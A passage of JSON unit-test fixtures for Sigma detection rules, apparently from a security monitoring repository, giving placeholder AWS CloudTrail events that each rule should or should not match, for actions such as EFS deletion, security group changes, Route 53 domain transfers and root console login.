82 | } 
-------------------------------------------------------------------------------- /rules/sigma_rules/aws_efs_fileshare_modified_or_deleted_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "elasticfilesystem.amazonaws.com", 27 | "eventName": "DeleteFileSystem", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 
| "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DeleteFileSystem", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_efs_fileshare_mount_modified_or_deleted_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "elasticfilesystem.amazonaws.com", 27 | "eventName": "DeleteMountTarget", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | 
"readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DeleteMountTarget", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_elasticache_security_group_created_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": 
"Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "elasticache.amazonaws.com", 27 | "eventName": "CreateCacheSecurityGroup", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "CreateCacheSecurityGroup", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 
77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_security_group_change_rds_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "rds.amazonaws.com", 27 | "eventName": "AuthorizeDBSecurityGroupIngress", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | 
"arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "AuthorizeDBSecurityGroupIngress", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_route53resolver_deleteresolver_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "route53resolver.amazonaws.com", 27 | "eventName": "DeleteResolverQueryLogConfig", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": 
null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DeleteResolverQueryLogConfig", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_route_53_domain_transferred_lock_disabled_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": 
"arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "route53.amazonaws.com", 27 | "eventName": "DisableDomainTransferLock", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DisableDomainTransferLock", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": 
null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_security_group_change_ingress_egress_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "AuthorizeSecurityGroupEgress", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": 
"arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "AuthorizeSecurityGroupEgress", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_elasticache_security_group_modified_or_deleted_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": 
"2025-03-09T16:39:48Z", 26 | "eventSource": "elasticache.amazonaws.com", 27 | "eventName": "DeleteCacheSecurityGroup", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "DeleteCacheSecurityGroup", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_root_account_usage_tests.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.08", 5 | "userIdentity": { 6 | "type": "Root", 7 | "principalId": "111122223333", 8 | "arn": "arn:aws:iam::111122223333:root", 9 | "accountId": "111122223333", 10 | "accessKeyId": "" 11 | }, 12 | "eventTime": "2023-07-12T13:35:31Z", 13 | "eventSource": "signin.amazonaws.com", 14 | "eventName": "ConsoleLogin", 15 | "awsRegion": "us-east-1", 16 | "sourceIPAddress": "192.0.2.0", 17 | "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", 18 | "requestParameters": null, 19 | "responseElements": { 20 | "ConsoleLogin": "Success" 21 | }, 22 | "additionalEventData": { 23 | "LoginTo": "https://console.aws.amazon.com/console/home?hashArgs=%23&isauthcode=true&nc2=h_ct&src=header-signin&state=hashArgsFromTB_ap-southeast-2_example80afacd389", 24 | "MobileVersion": "No", 25 | "MFAUsed": "No" 26 | }, 27 | "eventID": "4217cc13-7328-4820-a90c-EXAMPLE8002e6", 28 | "readOnly": false, 29 | "eventType": "AwsConsoleSignIn", 30 | "managementEvent": true, 31 | "recipientAccountId": "111122223333", 32 | "eventCategory": "Management", 33 | "tlsDetails": { 34 | "tlsVersion": "TLSv1.3", 35 | "cipherSuite": "TLS_AES_128_GCM_SHA256", 36 | "clientProvidedHostHeader": "signin.aws.amazon.com" 37 | } 38 | } 39 | ], 40 | "should_not_match": [ 41 | { 42 | "eventVersion": "1.09", 43 | "userIdentity": { 44 | "type": "AssumedRole", 45 | "principalId": "AROEXAMPLE", 46 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 47 | "accountId": "123456789012", 48 | "accessKeyId": "ASIAXXXXXX", 49 | "sessionContext": { 50 | "sessionIssuer": { 51 | "type": "Role", 52 | "principalId": "AROEXAMPLE", 53 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 54 | "accountId": "123456789012", 55 | "userName": "ExampleUserName" 56 | }, 57 | "attributes": { 58 | "creationDate": 
"2025-03-09T16:39:29Z", 59 | "mfaAuthenticated": "false" 60 | } 61 | } 62 | }, 63 | "eventTime": "2025-03-09T16:39:48Z", 64 | "eventSource": "notifications.amazonaws.com", 65 | "eventName": "ListNotificationHubs", 66 | "awsRegion": "us-east-1", 67 | "sourceIPAddress": "1.2.3.4", 68 | "userAgent": "ExampleAgent/1.0", 69 | "requestParameters": null, 70 | "responseElements": null, 71 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 72 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 73 | "readOnly": true, 74 | "eventType": "AwsApiCall", 75 | "managementEvent": true, 76 | "recipientAccountId": "123456789012", 77 | "eventCategory": "Management" 78 | } 79 | ] 80 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_route_53_domain_transferred_to_another_account_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "route53.amazonaws.com", 27 | "eventName": "TransferDomainToAnotherAwsAccount", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 
| "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "TransferDomainToAnotherAwsAccount", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | "eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_security_group_change_loadbalancer_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": 
